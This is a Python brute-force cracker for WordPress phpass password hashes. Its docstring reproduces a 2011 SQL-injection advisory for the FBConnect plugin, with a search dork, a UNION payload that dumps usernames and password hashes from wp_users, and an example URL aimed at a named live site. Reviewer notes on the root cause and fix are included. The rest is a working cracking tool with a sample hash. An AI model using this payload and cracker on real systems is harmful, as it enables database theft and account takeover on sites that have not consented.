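"""Offline brute force of WordPress "portable" phpass (``$P$``) password hashes.

Advisory that accompanied this script, reproduced as found (original author
"kiddevilz" alias in the payload; header credits below):

    Wordpress Sql Injection
    App     : FBConnect WordPress Plugin
    Type    : Sql-Injection
    Dork    : inurl:"fbconnect_action=myhome"
    Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,
              concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
    PoC     : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+
              select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12
              +from+wp_users--
    Example : http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union
              +select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,
              11,12+from+wp_users--

    code by       : tdxev
    website       : www.tdxev.com
    team          : www.insecurity.ro
    version       : 2011.01.17
    documentation : /wp-includes/class-phpass.php

Reviewer notes on the advisory (the plugin source is not on this page, so the
root-cause statements are inferred from the payload itself):

* The injection point is the ``fbuserid`` GET parameter: the payload only works
  if the plugin concatenates it unescaped into a SELECT (``1 and 1=2 union
  select ...``).  The plugin-side fix is to cast ``fbuserid`` to an integer
  and/or build the query with ``$wpdb->prepare()``.
* The UNION carries 12 columns and the ``concat(user_login,0x3a,user_pass)``
  expression sits in column 6.  Both the column count and the echoed position
  must match the vulnerable query on the target, so expect to adjust them
  rather than reuse the string verbatim.  ``0x3a`` is the ``:`` separator.
* ``user_pass`` values are phpass hashes: ``$P$`` + one count character +
  8 salt characters + 22 encoded characters, where the password is run through
  2**count iterations of MD5 (see ``/wp-includes/class-phpass.php``).  The
  code below re-implements that scheme so a candidate password can be tested
  against a dumped hash.  Pure-Python MD5 at 2**13 iterations per guess is far
  slower than a dedicated cracker; treat this as a reference implementation.

Changes from the 2011 original:

* ``import md5`` (removed in Python 3) replaced by ``hashlib``; bytes handled
  explicitly so the hash computation is the same on Python 3.
* ``encode64`` now mirrors the reference ``$i++ >= $count`` break placement
  exactly.  The original port broke one step too early for lengths that are
  2 (mod 3); for the only length phpass uses (16) the output was identical.
* The brute force no longer runs at import time: it lives in ``crack()`` and
  is started from ``main()`` under ``if __name__ == "__main__"``, so the module
  can be imported and tested.  A cracked hash is dropped from the candidate
  list instead of being re-hashed for every further word.
* Result/progress files are closed via ``with`` and a wrong hash type exits
  with a non-zero status.
"""

import hashlib
import sys

# user settings
wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"]  # list of WordPress hashes to crack
# $P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev   (claimed by the original author; not verified here)
charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-'  # characters the word generator cycles through
# NOTE(review): fixed, predictable names in the world-writable /tmp are a classic
# symlink / pre-creation problem on a shared host, and the result file holds
# cleartext credentials.  Point these at a directory only you can write to.
dumpFile = '/tmp/wp_crack_result.txt'    # where each "<hash> = <password>" result is appended
progFile = '/tmp/wp_crack_progress.txt'  # where the last word tried is recorded (overwritten)

# app settings
# phpass alphabet; the index of the 4th hash character in this string is log2 of the iteration count
itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'


def _as_bytes(value):
    """Return *value* as bytes, UTF-8 encoding text (phpass hashes raw bytes)."""
    if isinstance(value, bytes):
        return value
    return value.encode('utf-8')


def encode64(textInput, count):
    """phpass ``encode64``: encode the first *count* bytes of *textInput*.

    Three input bytes become four characters of ``itoa64`` (little-endian
    6-bit groups, like a non-standard base64).  A trailing partial group of
    one or two bytes yields two or three characters respectively, with no
    padding, so 16 bytes encode to 22 characters.

    :param textInput: bytes (or text, which is UTF-8 encoded) to encode
    :param count: how many leading bytes to encode
    :returns: the encoded string
    :raises IndexError: if *textInput* holds fewer than *count* bytes
    """
    data = bytearray(_as_bytes(textInput))  # bytearray so indexing yields ints on 2 and 3
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(itoa64[value & 0x3f])
        if i < count:
            value |= data[i] << 8
        out.append(itoa64[(value >> 6) & 0x3f])
        # reference: if ($i++ >= $count) break;  -- compare, then advance
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(itoa64[(value >> 12) & 0x3f])
        if i >= count:
            break
        i += 1
        out.append(itoa64[(value >> 18) & 0x3f])
    return ''.join(out)


def crypt_private(plainText, wordpressHash):
    """Recompute the phpass portable hash of *plainText* using *wordpressHash*'s settings.

    Mirrors ``PasswordHash::crypt_private``: the first 12 characters of the
    stored hash (type, iteration-count character, 8-char salt) are reused, the
    password is hashed as ``md5(salt + pw)`` and then ``2**count`` more times as
    ``md5(prev + pw)``, and the 16-byte digest is appended via :func:`encode64`.
    The candidate matches when the return value equals *wordpressHash*.

    :param plainText: candidate password (text is UTF-8 encoded before hashing)
    :param wordpressHash: stored ``$P$...`` hash supplying count and salt
    :returns: the recomputed hash string, or ``'*0'`` / ``'*1'`` when the
        stored hash is not a usable ``$P$`` hash (``'*1'`` only when the stored
        value itself starts with ``'*0'``, so the sentinel can never collide)
    """
    output = '*0'
    if wordpressHash[0:2] == output:
        output = '*1'
    # only the "portable" $P$ scheme is implemented (no DES / $H$ / bcrypt)
    if wordpressHash[0:3] != '$P$' or len(wordpressHash) < 4:
        return output
    count_log2 = itoa64.find(wordpressHash[3])
    if count_log2 < 7 or count_log2 > 30:  # same bounds as the PHP reference
        return output
    count = 1 << count_log2
    salt = wordpressHash[4:12]
    if len(salt) != 8:
        return output
    password = _as_bytes(plainText)
    digest = hashlib.md5(_as_bytes(salt) + password).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + password).digest()
    return wordpressHash[0:12] + encode64(digest, 16)


class wordGenerator():
    """Enumerate candidate words over a character set in counting order.

    Words are produced shortest first: every 1-character word, then every
    2-character word, and so on, each "digit" cycling through ``charSet``.
    """

    def __init__(self, word, charSet):
        """Start counting *after* *word* (``''`` starts at the first 1-char word)."""
        self.setCurretWord(word)
        self.setCharSet(charSet)

    def setCurretWord(self, word):
        """Set the word the next call to :meth:`nextWord` will increment."""
        self.currentWord = word

    def setCharSet(self, charSet):
        """Set the ordered character set used as the counting alphabet."""
        self.charSet = charSet

    def nextWord(self):
        """Advance to the next word, remember it and return it."""
        self.currentWord = self._incWord(self.currentWord)
        return self.currentWord

    def _incWord(self, word):
        """Return the successor of *word* (odometer-style carry into the prefix)."""
        word = str(word)
        if not word:
            return self.charSet[0]
        prefix, last = word[:-1], word[-1]
        pos = self.charSet.find(last) + 1
        if pos < len(self.charSet):
            return prefix + self.charSet[pos]
        # wrapped around: reset this digit and carry into the prefix
        return self._incWord(prefix) + self.charSet[0]


def found(hashItem, word, path=None):
    """Record a cracked hash: append ``"<hash> = <word>"`` to *path* and print it.

    :param path: result file; defaults to the module-level ``dumpFile``
    """
    if path is None:
        path = dumpFile
    with open(path, 'a') as d:
        d.write(hashItem + ' = ' + word + "\n")
    print(hashItem + ' = ' + word)


def setProgress(word, path=None):
    """Overwrite *path* with the last word tried so a run can be resumed by hand.

    :param path: progress file; defaults to the module-level ``progFile``
    """
    if path is None:
        path = progFile
    with open(path, 'w') as d:
        d.write("Position :" + word + "\n")


def crack(hashes, charSet, dumpFile=None, progFile=None, startWord='',
          maxWords=None, progressEvery=1000):
    """Brute-force *hashes* by enumerating words over *charSet*.

    :param hashes: ``$P$`` hashes to crack (duplicates are collapsed)
    :param charSet: ordered alphabet for :class:`wordGenerator`
    :param dumpFile: result file passed to :func:`found` (None = module default)
    :param progFile: progress file passed to :func:`setProgress` (None = module default)
    :param startWord: resume point; enumeration starts with the word *after* it
    :param maxWords: stop after this many candidates (None = run until all found)
    :param progressEvery: write the progress file every this many words (> 0)
    :returns: dict mapping each cracked hash to its password
    :raises ValueError: if any hash is not of the supported ``$P$`` type
    """
    remaining = list(dict.fromkeys(hashes))  # de-duplicate, keep order
    for wpHash in remaining:
        if wpHash[0:3] != '$P$':
            raise ValueError("Wrong password type or password type is DES not impemented yet!")
    cracked = {}
    generator = wordGenerator(startWord, charSet)
    tried = 0
    while remaining:
        if maxWords is not None and tried >= maxWords:
            break
        word = generator.nextWord()
        tried += 1
        for wpHash in list(remaining):
            if crypt_private(word, wpHash) == wpHash:
                found(wpHash, word, dumpFile)
                cracked[wpHash] = word
                remaining.remove(wpHash)  # don't keep re-hashing a solved entry
        if tried % progressEvery == 0:
            setProgress(word, progFile)
    return cracked


def main():
    """Run the brute force with the module-level user settings."""
    try:
        crack(wpHashList, charSet, dumpFile, progFile)
    except ValueError as exc:
        print(str(exc))
        sys.exit(1)


if __name__ == "__main__":
    main()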